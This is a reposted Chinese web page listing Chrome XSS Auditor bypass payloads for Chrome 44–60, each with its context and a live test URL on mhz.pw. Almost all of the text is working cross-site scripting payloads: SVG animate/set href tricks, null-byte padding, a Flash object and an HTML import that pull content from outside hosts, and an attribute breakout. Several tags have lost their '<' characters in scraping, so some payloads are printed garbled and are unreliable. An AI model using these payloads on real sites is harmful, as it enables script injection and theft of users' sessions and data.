IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

浏览器安全 / Chrome XSS Auditor bypass

发布时间:2017-08-18 13:47文章来源:互联网文章作者: 佚名点击次数:
Universal Bypass 5 最新版 Chrome 60 context = null test http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Bypass 4 (需交互的bypass) chrome 60 ?c=

Universal Bypass 5

最新版 Chrome 60

context = null

test

http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

Bypass 4 (需交互的bypass)

chrome 60

?c=svg>animate href=#x attributeName=href values= javascript:alert(1) />a id=x>rect width=100 height=100 />a>

// or

?c=svg width=10000px height=10000px>a>rect width=10000px height=10000px z-index=9999999 />animate attributeName=href values=javascript:alert(1)>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

Bypass 3 via flash

只要支持flash的chrome版本(到Chrome 56),均可使用。

context = support flash

object allowscriptaccess=always> param name=url value=http://mhz.pw/game/xss/alert.swf>

test

http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E

Universal Bypass 2

到Chrome 55/56可用, 无任何条件,只要输出在页面中即可执行代码。

context = null

?xss=svg>set href=#script attributeName=href to=data:,alert(document.domain) />script id=script src=foo>script>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E

Universal Bypass 1

到Chrome 55/56可用,无任何条件,只要输出在页面中即可执行代码。

context = null

?xss=

test

http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3D%22import%22%20href%3D%22https%3Awww.leavesongs.com%2Ftestxss%22

Chrome 59 && 输出点后面有空格的情况

context:

header('X-XSS-Protection: 1; mode=block');

echo "{$_GET['html']} ";

test

http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script

Chrome 44/45 + 属性中输出的情况

https://code.google.com/p/chromium/issues/detail?id=526104

chrome 45+ fixed

context:

html>

head>

title>XSSAuditor bypasstitle>

head>

body>

form>

input type="text" value="input=foo'?>">

form>

body>

html>

payload:

">script>prompt(/XSS/);1%02script

test

http://mhz.pw/game/xss/attr.php?xss=%22%3E%3Cscript%3Eprompt(%2FXSS%2F)%3B1%2502%3Cscript%3C%2Fscript%3E

无charset Bypass
浏览器安全 / Chrome XSS Auditor bypass
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/diannao/wangluo/1050882.html

标签分类:

上一篇:上一篇:根据powershell语言的特性来混淆代码的方法与原理
下一篇: 下一篇:没有了
无觅关联推荐,快速提升流量